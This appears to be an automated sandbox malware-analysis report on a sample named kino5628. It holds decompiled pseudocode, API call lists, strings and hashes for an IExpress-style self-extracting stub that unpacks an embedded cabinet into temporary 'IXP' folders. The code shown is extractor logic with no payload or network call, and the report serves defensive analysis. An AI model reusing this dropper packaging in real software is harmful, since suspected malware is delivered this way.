						FormatMessageA(0x1000, 0, GetLastError(), 0,  &_v788, 0x200, 0);
						_t110 = 0x4b0;
						L30:
						__eflags = 0;
						E008E44B9(0, _t110, _t118,  &_v788, 0x10, 0);
						SetCurrentDirectoryA( &_v276);
						L31:
						_t66 = 0;
						__eflags = 0;
						L32:
						_pop(_t114);
						goto L33;
					}
					_t69 = _v792 * _v796;
					_v812 = _t69;
					_t116 = MulDiv(_t69, _v800, 0x400);
					__eflags = _t116;
					if(_t116 == 0) {
						goto L29;
					}
					_t73 = GetVolumeInformationA(0, 0, 0, 0,  &_v820,  &_v816, 0, 0); // executed
					__eflags = _t73;
					if(_t73 != 0) {
						SetCurrentDirectoryA( &_v276); // executed
						_t101 =  &_v16;
						_t111 = 6;
						_t119 = _t118 - _t101;
						__eflags = _t119;
						while(1) {
							_t22 = _t111 - 4; // 0x2
							__eflags = _t22;
							if(_t22 == 0) {
								break;
							}
							_t87 =  *((intOrPtr*)(_t119 + _t101));
							__eflags = _t87;
							if(_t87 == 0) {
								break;
							}
							 *_t101 = _t87;
							_t101 = _t101 + 1;
							_t111 = _t111 - 1;
							__eflags = _t111;
							if(_t111 != 0) {
								continue;
							}
							break;
						}
						__eflags = _t111;
						if(_t111 == 0) {
							_t101 = _t101 - 1;
							__eflags = _t101;
						}
						 *_t101 = 0;
						_t112 = 0x200;
						_t102 = _v812;
						_t78 = 0;
						_t118 = 8;
						while(1) {
							__eflags = _t102 - _t112;
							if(_t102 == _t112) {
								break;
							}
							_t112 = _t112 + _t112;
							_t78 = _t78 + 1;
							__eflags = _t78 - _t118;
							if(_t78 < _t118) {
								continue;
							}
							break;
						}
						__eflags = _t78 - _t118;
						if(_t78 != _t118) {
							__eflags =  *0x8e9a34 & 0x00000008;
							if(( *0x8e9a34 & 0x00000008) == 0) {
								L20:
								_t103 =  *0x8e9a38; // 0x0
								_t110 =  *((intOrPtr*)(0x8e89e0 + (_t78 & 0x0000ffff) * 4));
								L21:
								__eflags = (_v804 & 0x00000003) - 3;
								if((_v804 & 0x00000003) != 3) {
									__eflags = _v804 & 0x00000001;
									if((_v804 & 0x00000001) == 0) {
										__eflags = _t103 - _t116;
									} else {
										__eflags = _t110 - _t116;
									}
								} else {
									__eflags = _t103 + _t110 - _t116;
								}
								if(__eflags <= 0) {
									 *0x8e9124 = 0;
									_t66 = 1;
								} else {
									_t66 = E008E268B(_a4, _t110, _t103,  &_v16);
								}
								goto L32;
							}
							__eflags = _v816 & 0x00008000;
							if((_v816 & 0x00008000) == 0) {
								goto L20;
							}
							_t105 =  *0x8e9a38; // 0x0
							_t110 =  *((intOrPtr*)(0x8e89e0 + (_t78 & 0x0000ffff) * 4)) +  *((intOrPtr*)(0x8e89e0 + (_t78 & 0x0000ffff) * 4));
							_t103 = (_t105 >> 2) +  *0x8e9a38;
							goto L21;
						}
						_t110 = 0x4c5;
						E008E44B9(0, 0x4c5, 0, 0, 0x10, 0);
						goto L31;
					}
					memset( &_v788, 0, 0x200);
					 *0x8e9124 = E008E6285();
					FormatMessageA(0x1000, 0, GetLastError(), 0,  &_v788, 0x200, 0);
					_t110 = 0x4f9;
					goto L30;
				} else {
					_t110 = 0x4bc;
					E008E44B9(0, 0x4bc, 0, 0, 0x10, 0);
					 *0x8e9124 = E008E6285();
					_t66 = 0;
					L33:
					return E008E6CE0(_t66, 0, _v8 ^ _t120, _t110, _t114, _t118);
				}
			}

0x008e597d
0x008e5988
0x008e598f
0x008e599a
0x008e59a6
0x008e59a8
0x008e59af
0x008e59b9
0x008e59dd
0x008e59e4
0x008e59f1
0x008e59fe
0x008e5a0b
0x008e5a13
0x008e5a19
0x008e5a1b
0x008e5ba1
0x008e5baf
0x008e5bbd
0x008e5bd8
0x008e5bde
0x008e5be3
0x008e5bec
0x008e5bf0
0x008e5bfc
0x008e5c02
0x008e5c02
0x008e5c02
0x008e5c04
0x008e5c04
0x00000000
0x008e5c04
0x008e5a27
0x008e5a3a
0x008e5a46
0x008e5a48
0x008e5a4a
0x00000000
0x00000000
0x008e5a64
0x008e5a6a
0x008e5a6c
0x008e5abc
0x008e5ac2
0x008e5ac9
0x008e5aca
0x008e5aca
0x008e5acc
0x008e5acc
0x008e5acf
0x008e5ad1
0x00000000
0x00000000
0x008e5ad3
0x008e5ad6
0x008e5ad8
0x00000000
0x00000000
0x008e5ada
0x008e5adc
0x008e5add
0x008e5add
0x008e5ae0
0x00000000
0x00000000
0x00000000
0x008e5ae0
0x008e5ae2
0x008e5ae4
0x008e5ae6
0x008e5ae6
0x008e5ae6
0x008e5ae9
0x008e5aeb
0x008e5af0
0x008e5af6
0x008e5af8
0x008e5af9
0x008e5af9
0x008e5afb
0x00000000
0x00000000
0x008e5afd
0x008e5aff
0x008e5b00
0x008e5b03
0x00000000
0x00000000
0x00000000
0x008e5b03
0x008e5b05
0x008e5b08
0x008e5b20
0x008e5b27
0x008e5b52
0x008e5b52
0x008e5b5b
0x008e5b62
0x008e5b6b
0x008e5b6d
0x008e5b76
0x008e5b7d
0x008e5b83
0x008e5b7f
0x008e5b7f
0x008e5b7f
0x008e5b6f
0x008e5b72
0x008e5b72
0x008e5b85
0x008e5b98
0x008e5b9e
0x008e5b87
0x008e5b8f
0x008e5b8f
0x00000000
0x008e5b85
0x008e5b29
0x008e5b33
0x00000000
0x00000000
0x008e5b35
0x008e5b48
0x008e5b4a
0x00000000
0x008e5b4a
0x008e5b0f
0x008e5b16
0x00000000
0x008e5b16
0x008e5a7c
0x008e5a8a
0x008e5aa5
0x008e5aab
0x00000000
0x008e59bb
0x008e59c0
0x008e59c7
0x008e59d1
0x008e59d6
0x008e5c05
0x008e5c14
0x008e5c14

APIs

GetCurrentDirectoryA.KERNEL32(00000104,?,00000000,00000000), ref: 008E59A8
SetCurrentDirectoryA.KERNELBASE(?), ref: 008E59AF
GetDiskFreeSpaceA.KERNELBASE(00000000,?,?,?,?,00000001), ref: 008E5A13
MulDiv.KERNEL32(?,?,00000400), ref: 008E5A40
GetVolumeInformationA.KERNELBASE(00000000,00000000,00000000,00000000,?,?,00000000,00000000), ref: 008E5A64
memset.MSVCRT ref: 008E5A7C
GetLastError.KERNEL32(00000000,?,00000200,00000000), ref: 008E5A98
FormatMessageA.KERNEL32(00001000,00000000,00000000), ref: 008E5AA5
SetCurrentDirectoryA.KERNEL32(?,?,?,00000010,00000000), ref: 008E5BFC

Part of subcall function 008E44B9: LoadStringA.USER32(000004B1,?,00000200,00000000), ref: 008E4518
Part of subcall function 008E44B9: MessageBoxA.USER32(?,?,doza2,00010010), ref: 008E4554

Part of subcall function 008E6285: GetLastError.KERNEL32(008E5BBC), ref: 008E6285

Memory Dump Source

Source File: 00000001.00000002.335529120.00000000008E1000.00000020.00000001.01000000.00000004.sdmp, Offset: 008E0000, based on PE: true

Associated: 00000001.00000002.335523203.00000000008E0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.335537425.00000000008E8000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.335543262.00000000008EA000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.335543262.00000000008EC000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_8e0000_kino5628.jbxd

Similarity

API ID: CurrentDirectory$ErrorLastMessage$DiskFormatFreeInformationLoadSpaceStringVolumememset
String ID:
API String ID: 4237285672-0
Opcode ID: 8cc1eb8f1f5b9f590622610178a66dbe5e5d9457ae702ffe2b734869c5e6284a
Instruction ID: d7612fb8c7a5b8d9237deb62c4d84acc12a94f19c72ef9d21c5a1409bc3e866f
Opcode Fuzzy Hash: 8cc1eb8f1f5b9f590622610178a66dbe5e5d9457ae702ffe2b734869c5e6284a
Instruction Fuzzy Hash: BE71C2B190069CAFEB15DB25CCC5BFB77ACFB8A348F1441A9F546D6140EB309E848B21

Uniqueness

Uniqueness Score: -1.00%

Function 008E4FE0 Relevance: 19.4, APIs: 9, Strings: 2, Instructions: 121
windowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 77%

			E008E4FE0(void* __edi, void* __eflags) {
				void* __ebx;
				void* _t8;
				struct HWND__* _t9;
				int _t10;
				void* _t12;
				struct HWND__* _t24;
				struct HWND__* _t27;
				intOrPtr _t29;
				void* _t33;
				int _t34;
				CHAR* _t36;
				int _t37;
				intOrPtr _t47;

				_t33 = __edi;
				_t36 = "CABINET";
				 *0x8e9144 = E008E468F(_t36, 0, 0);
				_t8 = LockResource(LoadResource(0, FindResourceA(0, _t36, 0xa)));
				 *0x8e9140 = _t8;
				if(_t8 == 0) {
					return _t8;
				}
				_t9 =  *0x8e8584; // 0x0
				if(_t9 != 0) {
					ShowWindow(GetDlgItem(_t9, 0x842), 0);
					ShowWindow(GetDlgItem( *0x8e8584, 0x841), 5);
				}
				_t10 = E008E4EFD(0, 0);
				if(_t10 != 0) {
					__imp__#20(E008E4CA0, E008E4CC0, E008E4980, E008E4A50, E008E4AD0, E008E4B60, E008E4BC0, 1, 0x8e9148, _t33);
					_t34 = _t10;
					if(_t34 == 0) {
						L8:
						_t29 =  *0x8e9148; // 0x0
						_t24 =  *0x8e8584; // 0x0
						E008E44B9(_t24, _t29 + 0x514, 0, 0, 0x10, 0);
						_t37 = 0;
						L9:
						goto L10;
					}
					__imp__#22(_t34, "*MEMCAB", 0x8e1140, 0, E008E4CD0, 0, 0x8e9140); // executed
					_t37 = _t10;
					if(_t37 == 0) {
						goto L9;
					}
					__imp__#23(_t34); // executed
					if(_t10 != 0) {
						goto L9;
					}
					goto L8;
				} else {
					_t27 =  *0x8e8584; // 0x0
					E008E44B9(_t27, 0x4ba, 0, 0, 0x10, 0);
					_t37 = 0;
					L10:
					_t12 =  *0x8e9140; // 0x0
					if(_t12 != 0) {
						FreeResource(_t12);
						 *0x8e9140 = 0;
					}
					if(_t37 == 0) {
						_t47 =  *0x8e91d8; // 0x0
						if(_t47 == 0) {
							E008E44B9(0, 0x4f8, 0, 0, 0x10, 0);
						}
					}
					if(( *0x8e8a38 & 0x00000001) == 0 && ( *0x8e9a34 & 0x00000001) == 0) {
						SendMessageA( *0x8e8584, 0xfa1, _t37, 0);
					}
					return _t37;
				}
			}

0x008e4fe0
0x008e4fe6
0x008e4ff9
0x008e500d
0x008e5013
0x008e501a
0x008e5163
0x008e5163
0x008e5020
0x008e5027
0x008e5037
0x008e5051
0x008e5051
0x008e5057
0x008e505e
0x008e50a7
0x008e50ad
0x008e50b4
0x008e50e8
0x008e50e8
0x008e50ee
0x008e50ff
0x008e5104
0x008e5106
0x00000000
0x008e5106
0x008e50cd
0x008e50d3
0x008e50da
0x00000000
0x00000000
0x008e50dd
0x008e50e6
0x00000000
0x00000000
0x00000000
0x008e5060
0x008e5060
0x008e5070
0x008e5075
0x008e5107
0x008e5107
0x008e510e
0x008e5111
0x008e5117
0x008e5117
0x008e511f
0x008e5121
0x008e5127
0x008e5135
0x008e5135
0x008e5127
0x008e5141
0x008e5159
0x008e5159
0x00000000
0x008e515f

APIs

Part of subcall function 008E468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 008E46A0
Part of subcall function 008E468F: SizeofResource.KERNEL32(00000000,00000000,?,008E2D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 008E46A9
Part of subcall function 008E468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 008E46C3
Part of subcall function 008E468F: LoadResource.KERNEL32(00000000,00000000,?,008E2D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 008E46CC
Part of subcall function 008E468F: LockResource.KERNEL32(00000000,?,008E2D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 008E46D3
Part of subcall function 008E468F: memcpy_s.MSVCRT ref: 008E46E5
Part of subcall function 008E468F: FreeResource.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000002,00000000), ref: 008E46EF

FindResourceA.KERNEL32(00000000,CABINET,0000000A), ref: 008E4FFE
LoadResource.KERNEL32(00000000,00000000), ref: 008E5006
LockResource.KERNEL32(00000000), ref: 008E500D
GetDlgItem.USER32(00000000,00000842), ref: 008E5030
ShowWindow.USER32(00000000), ref: 008E5037
GetDlgItem.USER32(00000841,00000005), ref: 008E504A
ShowWindow.USER32(00000000), ref: 008E5051
FreeResource.KERNEL32(00000000,00000000,00000010,00000000), ref: 008E5111
SendMessageA.USER32(00000FA1,00000000,00000000,00000000), ref: 008E5159

Strings

*MEMCAB, xrefs: 008E50C7
CABINET, xrefs: 008E4FE6, 008E4FF7

Memory Dump Source

Source File: 00000001.00000002.335529120.00000000008E1000.00000020.00000001.01000000.00000004.sdmp, Offset: 008E0000, based on PE: true

Associated: 00000001.00000002.335523203.00000000008E0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.335537425.00000000008E8000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.335543262.00000000008EA000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.335543262.00000000008EC000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_8e0000_kino5628.jbxd

Similarity

API ID: Resource$Find$FreeItemLoadLockShowWindow$MessageSendSizeofmemcpy_s
String ID: *MEMCAB$CABINET
API String ID: 1305606123-2642027498
Opcode ID: 4a14c7d723d31c90f84309b02a27d01924d116c83d736a65a9b0a7b59b9acefc
Instruction ID: 2986436a6e1f65be9ebb408789d20a974850eda4408466a2d6d37c18245c058b
Opcode Fuzzy Hash: 4a14c7d723d31c90f84309b02a27d01924d116c83d736a65a9b0a7b59b9acefc
Instruction Fuzzy Hash: 6C31F4B07407C2FBE7205B67ADC9F6B365CF746B59F040024F91AEA2A1DABD9C008661

Uniqueness

Uniqueness Score: -1.00%

Function 008E44B9 Relevance: 17.7, APIs: 8, Strings: 2, Instructions: 160
memorywindowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 94%

			E008E44B9(struct HWND__* __ecx, int __edx, intOrPtr* _a4, void* _a8, int _a12, signed int _a16) {
				signed int _v8;
				char _v64;
				char _v576;
				void* _v580;
				struct HWND__* _v584;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t34;
				void* _t37;
				signed int _t39;
				intOrPtr _t43;
				signed int _t44;
				signed int _t49;
				signed int _t52;
				void* _t54;
				intOrPtr _t55;
				intOrPtr _t58;
				intOrPtr _t59;
				int _t64;
				void* _t66;
				intOrPtr* _t67;
				signed int _t69;
				intOrPtr* _t73;
				intOrPtr* _t76;
				intOrPtr* _t77;
				void* _t80;
				void* _t81;
				void* _t82;
				intOrPtr* _t84;
				void* _t85;
				signed int _t89;

				_t75 = __edx;
				_t34 =  *0x8e8004; // 0xaf179a30
				_v8 = _t34 ^ _t89;
				_v584 = __ecx;
				_t83 = "LoadString() Error.  Could not load string resource.";
				_t67 = _a4;
				_t69 = 0xd;
				_t37 = memcpy( &_v64, _t83, _t69 << 2);
				_t80 = _t83 + _t69 + _t69;
				_v580 = _t37;
				asm("movsb");
				if(( *0x8e8a38 & 0x00000001) != 0) {
					_t39 = 1;
				} else {
					_v576 = 0;
					LoadStringA( *0x8e9a3c, _t75,  &_v576, 0x200);
					if(_v576 != 0) {
						_t73 =  &_v576;
						_t16 = _t73 + 1; // 0x1
						_t75 = _t16;
						do {
							_t43 =  *_t73;
							_t73 = _t73 + 1;
						} while (_t43 != 0);
						_t84 = _v580;
						_t74 = _t73 - _t75;
						if(_t84 == 0) {
							if(_t67 == 0) {
								_t27 = _t74 + 1; // 0x2
								_t83 = _t27;
								_t44 = LocalAlloc(0x40, _t83);
								_t80 = _t44;
								if(_t80 == 0) {
									goto L6;
								} else {
									_t75 = _t83;
									_t74 = _t80;
									E008E1680(_t80, _t83,  &_v576);
									goto L23;
								}
							} else {
								_t76 = _t67;
								_t24 = _t76 + 1; // 0x1
								_t85 = _t24;
								do {
									_t55 =  *_t76;
									_t76 = _t76 + 1;
								} while (_t55 != 0);
								_t25 = _t76 - _t85 + 0x64; // 0x65
								_t83 = _t25 + _t74;
								_t44 = LocalAlloc(0x40, _t25 + _t74);
								_t80 = _t44;
								if(_t80 == 0) {
									goto L6;
								} else {
									E008E171E(_t80, _t83,  &_v576, _t67);
									goto L23;
								}
							}
						} else {
							_t77 = _t67;
							_t18 = _t77 + 1; // 0x1
							_t81 = _t18;
							do {
								_t58 =  *_t77;
								_t77 = _t77 + 1;
							} while (_t58 != 0);
							_t75 = _t77 - _t81;
							_t82 = _t84 + 1;
							do {
								_t59 =  *_t84;
								_t84 = _t84 + 1;
							} while (_t59 != 0);
							_t21 = _t74 + 0x64; // 0x65
							_t83 = _t21 + _t84 - _t82 + _t75;
							_t44 = LocalAlloc(0x40, _t21 + _t84 - _t82 + _t75);
							_t80 = _t44;
							if(_t80 == 0) {
								goto L6;
							} else {
								_push(_v580);
								E008E171E(_t80, _t83,  &_v576, _t67);
								L23:
								MessageBeep(_a12);
								if(E008E681F(_t67) == 0) {
									L25:
									_t49 = 0x10000;
								} else {
									_t54 = E008E67C9(_t74, _t74);
									_t49 = 0x190000;
									if(_t54 == 0) {
										goto L25;
									}
								}
								_t52 = MessageBoxA(_v584, _t80, "doza2", _t49 | _a12 | _a16); // executed
								_t83 = _t52;
								LocalFree(_t80);
								_t39 = _t52;
							}
						}
					} else {
						if(E008E681F(_t67) == 0) {
							L4:
							_t64 = 0x10010;
						} else {
							_t66 = E008E67C9(0, 0);
							_t64 = 0x190010;
							if(_t66 == 0) {
								goto L4;
							}
						}
						_t44 = MessageBoxA(_v584,  &_v64, "doza2", _t64);
						L6:
						_t39 = _t44 | 0xffffffff;
					}
				}
				return E008E6CE0(_t39, _t67, _v8 ^ _t89, _t75, _t80, _t83);
			}

0x008e44b9
0x008e44c4
0x008e44cb
0x008e44d8
0x008e44e4
0x008e44eb
0x008e44ee
0x008e44ef
0x008e44ef
0x008e44f1
0x008e44f7
0x008e44f8
0x008e467b
0x008e44fe
0x008e4509
0x008e4518
0x008e4525
0x008e4562
0x008e4568
0x008e4568
0x008e456b
0x008e456b
0x008e456d
0x008e456e
0x008e4572
0x008e4578
0x008e457c
0x008e45cb
0x008e4607
0x008e4607
0x008e460d
0x008e4613
0x008e4617
0x00000000
0x008e461d
0x008e4623
0x008e4626
0x008e4628
0x00000000
0x008e4628
0x008e45cd
0x008e45cd
0x008e45cf
0x008e45cf
0x008e45d2
0x008e45d2
0x008e45d4
0x008e45d5
0x008e45db
0x008e45de
0x008e45e3
0x008e45e9
0x008e45ed
0x00000000
0x008e45f3
0x008e45fd
0x00000000
0x008e4602
0x008e45ed
0x008e457e
0x008e457e
0x008e4580
0x008e4580
0x008e4583
0x008e4583
0x008e4585
0x008e4586
0x008e458a
0x008e458c
0x008e458f
0x008e458f
0x008e4591
0x008e4592
0x008e459b
0x008e459e
0x008e45a3
0x008e45a9
0x008e45ad
0x00000000
0x008e45af
0x008e45af
0x008e45bf
0x008e462d
0x008e4630
0x008e463d
0x008e464e
0x008e464e
0x008e463f
0x008e4640
0x008e4647
0x008e464c
0x00000000
0x00000000
0x008e464c
0x008e4666
0x008e466d
0x008e466f
0x008e4675
0x008e4675
0x008e45ad
0x008e4527
0x008e452e
0x008e453f
0x008e453f
0x008e4530
0x008e4531
0x008e4538
0x008e453d
0x00000000
0x00000000
0x008e453d
0x008e4554
0x008e455a
0x008e455a
0x008e455a
0x008e4525
0x008e468c

APIs

LoadStringA.USER32(000004B1,?,00000200,00000000), ref: 008E4518
MessageBoxA.USER32(?,?,doza2,00010010), ref: 008E4554
LocalAlloc.KERNEL32(00000040,00000065), ref: 008E45A3
LocalAlloc.KERNEL32(00000040,00000065), ref: 008E45E3
LocalAlloc.KERNEL32(00000040,00000002), ref: 008E460D
MessageBeep.USER32(00000000), ref: 008E4630
MessageBoxA.USER32(?,00000000,doza2,00000000), ref: 008E4666
LocalFree.KERNEL32(00000000), ref: 008E466F

Part of subcall function 008E681F: GetVersionExA.KERNEL32(?,00000000,00000002), ref: 008E686E
Part of subcall function 008E681F: GetSystemMetrics.USER32(0000004A), ref: 008E68A7
Part of subcall function 008E681F: RegOpenKeyExA.ADVAPI32(80000001,Control Panel\Desktop\ResourceLocale,00000000,00020019,?), ref: 008E68CC
Part of subcall function 008E681F: RegQueryValueExA.ADVAPI32(?,008E1140,00000000,?,?,0000000C), ref: 008E68F4
Part of subcall function 008E681F: RegCloseKey.ADVAPI32(?), ref: 008E6902

Strings

doza2, xrefs: 008E4545, 008E465A
LoadString() Error. Could not load string resource., xrefs: 008E44E4

Memory Dump Source

Source File: 00000001.00000002.335529120.00000000008E1000.00000020.00000001.01000000.00000004.sdmp, Offset: 008E0000, based on PE: true

Associated: 00000001.00000002.335523203.00000000008E0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.335537425.00000000008E8000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.335543262.00000000008EA000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.335543262.00000000008EC000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_8e0000_kino5628.jbxd

Similarity

API ID: Local$AllocMessage$BeepCloseFreeLoadMetricsOpenQueryStringSystemValueVersion
String ID: LoadString() Error. Could not load string resource.$doza2
API String ID: 3244514340-3130468218
Opcode ID: 18fa08a768cfbfe15056413c1f7409b344c1366f877d40140799e83fd7a5e3cc
Instruction ID: a944721a0df613db6ae9c79e628902e2e73209012413c7a1c3f9a733831e3681
Opcode Fuzzy Hash: 18fa08a768cfbfe15056413c1f7409b344c1366f877d40140799e83fd7a5e3cc
Instruction Fuzzy Hash: 6551F472900299ABDB219F2ACC88BAA7B69FF47700F1041A4FD5DE7251DB35DD05CB50

Uniqueness

Uniqueness Score: -1.00%

Function 008E53A1 Relevance: 15.8, APIs: 6, Strings: 3, Instructions: 71
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 95%

			E008E53A1(CHAR* __ecx, CHAR* __edx) {
				signed int _v8;
				char _v268;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t5;
				long _t13;
				int _t14;
				CHAR* _t20;
				int _t29;
				int _t30;
				CHAR* _t32;
				signed int _t33;
				void* _t34;

				_t5 =  *0x8e8004; // 0xaf179a30
				_v8 = _t5 ^ _t33;
				_t32 = __edx;
				_t20 = __ecx;
				_t29 = 0;
				while(1) {
					E008E171E( &_v268, 0x104, "IXP%03d.TMP", _t29);
					_t34 = _t34 + 0x10;
					_t29 = _t29 + 1;
					E008E1680(_t32, 0x104, _t20);
					E008E658A(_t32, 0x104,  &_v268); // executed
					RemoveDirectoryA(_t32); // executed
					_t13 = GetFileAttributesA(_t32); // executed
					if(_t13 == 0xffffffff) {
						break;
					}
					if(_t29 < 0x190) {
						continue;
					}
					L3:
					_t30 = 0;
					if(GetTempFileNameA(_t20, "IXP", 0, _t32) != 0) {
						_t30 = 1;
						DeleteFileA(_t32);
						CreateDirectoryA(_t32, 0);
					}
					L5:
					return E008E6CE0(_t30, _t20, _v8 ^ _t33, 0x104, _t30, _t32);
				}
				_t14 = CreateDirectoryA(_t32, 0); // executed
				if(_t14 == 0) {
					goto L3;
				}
				_t30 = 1;
				 *0x8e8a20 = 1;
				goto L5;
			}

0x008e53ac
0x008e53b3
0x008e53b9
0x008e53bb
0x008e53bd
0x008e53bf
0x008e53d1
0x008e53d6
0x008e53e0
0x008e53e2
0x008e53f5
0x008e53fb
0x008e5402
0x008e540b
0x00000000
0x00000000
0x008e5413
0x00000000
0x00000000
0x008e5415
0x008e5416
0x008e5427
0x008e542a
0x008e542b
0x008e5434
0x008e5434
0x008e543a
0x008e544c
0x008e544c
0x008e5452
0x008e545a
0x00000000
0x00000000
0x008e545e
0x008e545f
0x00000000

APIs

Part of subcall function 008E171E: _vsnprintf.MSVCRT ref: 008E1750

RemoveDirectoryA.KERNELBASE(?,?,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,?,00000001,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,00000000), ref: 008E53FB
GetFileAttributesA.KERNELBASE(?,?,00000001,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,00000000), ref: 008E5402
GetTempFileNameA.KERNEL32(C:\Users\user\AppData\Local\Temp\IXP001.TMP\,IXP,00000000,?,?,00000001,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,00000000), ref: 008E541F
DeleteFileA.KERNEL32(?,?,00000001,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,00000000), ref: 008E542B
CreateDirectoryA.KERNEL32(?,00000000,?,00000001,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,00000000), ref: 008E5434
CreateDirectoryA.KERNELBASE(?,00000000,?,00000001,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,00000000), ref: 008E5452

Strings

C:\Users\user\AppData\Local\Temp\IXP001.TMP\, xrefs: 008E53B7, 008E53E1, 008E541E
IXP, xrefs: 008E5419
IXP%03d.TMP, xrefs: 008E53C0

Memory Dump Source

Source File: 00000001.00000002.335529120.00000000008E1000.00000020.00000001.01000000.00000004.sdmp, Offset: 008E0000, based on PE: true

Associated: 00000001.00000002.335523203.00000000008E0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.335537425.00000000008E8000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.335543262.00000000008EA000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.335543262.00000000008EC000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_8e0000_kino5628.jbxd

Similarity

API ID: DirectoryFile$Create$AttributesDeleteNameRemoveTemp_vsnprintf
String ID: C:\Users\user\AppData\Local\Temp\IXP001.TMP\$IXP$IXP%03d.TMP
API String ID: 1082909758-4044985724
Opcode ID: 89a0f02a0f5c59700098f3acc74fadef5bc5cbcce13fd42f8755fcc2f6f7c0d9
Instruction ID: 82296b9949d57be7aed113950ccd90fa125dc994be09f83423374c27b8d793c1
Opcode Fuzzy Hash: 89a0f02a0f5c59700098f3acc74fadef5bc5cbcce13fd42f8755fcc2f6f7c0d9
Instruction Fuzzy Hash: 55113471300984A7D724AB279C88FAF366DFBD3B29F000024B516C62D0DE748D8286A6

Uniqueness

Uniqueness Score: -1.00%

Function 008E5467 Relevance: 14.1, APIs: 3, Strings: 5, Instructions: 101
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 75%

			E008E5467(CHAR* __ecx, void* __edx, char* _a4) {
				signed int _v8;
				char _v268;
				struct _SYSTEM_INFO _v304;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t10;
				void* _t13;
				intOrPtr _t14;
				void* _t16;
				void* _t20;
				signed int _t26;
				void* _t28;
				void* _t29;
				CHAR* _t48;
				signed int _t49;
				intOrPtr _t61;

				_t10 =  *0x8e8004; // 0xaf179a30
				_v8 = _t10 ^ _t49;
				_push(__ecx);
				if(__edx == 0) {
					_t48 = 0x8e91e4;
					_t42 = 0x104;
					E008E1680(0x8e91e4, 0x104);
					L14:
					_t13 = E008E58C8(_t48); // executed
					if(_t13 != 0) {
						L17:
						_t42 = _a4;
						if(_a4 == 0) {
							L23:
							 *0x8e9124 = 0;
							_t14 = 1;
							L24:
							return E008E6CE0(_t14, 0, _v8 ^ _t49, _t42, 1, _t48);
						}
						_t16 = E008E597D(_t48, _t42, 1, 0); // executed
						if(_t16 != 0) {
							goto L23;
						}
						_t61 =  *0x8e8a20; // 0x0
						if(_t61 != 0) {
							 *0x8e8a20 = 0;
							RemoveDirectoryA(_t48);
						}
						L22:
						_t14 = 0;
						goto L24;
					}
					if(CreateDirectoryA(_t48, 0) == 0) {
						 *0x8e9124 = E008E6285();
						goto L22;
					}
					 *0x8e8a20 = 1;
					goto L17;
				}
				_t42 =  &_v268;
				_t20 = E008E53A1(__ecx,  &_v268); // executed
				if(_t20 == 0) {
					goto L22;
				}
				_push(__ecx);
				_t48 = 0x8e91e4;
				E008E1781(0x8e91e4, 0x104, __ecx,  &_v268);
				if(( *0x8e9a34 & 0x00000020) == 0) {
					L12:
					_t42 = 0x104;
					E008E658A(_t48, 0x104, 0x8e1140);
					goto L14;
				}
				GetSystemInfo( &_v304);
				_t26 = _v304.dwOemId & 0x0000ffff;
				if(_t26 == 0) {
					_push("i386");
					L11:
					E008E658A(_t48, 0x104);
					goto L12;
				}
				_t28 = _t26 - 1;
				if(_t28 == 0) {
					_push("mips");
					goto L11;
				}
				_t29 = _t28 - 1;
				if(_t29 == 0) {
					_push("alpha");
					goto L11;
				}
				if(_t29 != 1) {
					goto L12;
				}
				_push("ppc");
				goto L11;
			}

0x008e5472
0x008e5479
0x008e5481
0x008e5484
0x008e551c
0x008e5521
0x008e5528
0x008e552d
0x008e552f
0x008e5539
0x008e554d
0x008e554d
0x008e5552
0x008e5585
0x008e5585
0x008e558b
0x008e558d
0x008e559d
0x008e559d
0x008e5557
0x008e555e
0x00000000
0x00000000
0x008e5560
0x008e5566
0x008e5569
0x008e556f
0x008e556f
0x008e5581
0x008e5581
0x00000000
0x008e5581
0x008e5545
0x008e557c
0x00000000
0x008e557c
0x008e5547
0x00000000
0x008e5547
0x008e548a
0x008e5490
0x008e5497
0x00000000
0x00000000
0x008e549d
0x008e54ab
0x008e54b4
0x008e54c0
0x008e550c
0x008e5511
0x008e5515
0x00000000
0x008e5515
0x008e54c9
0x008e54d6
0x008e54d8
0x008e54fe
0x008e5503
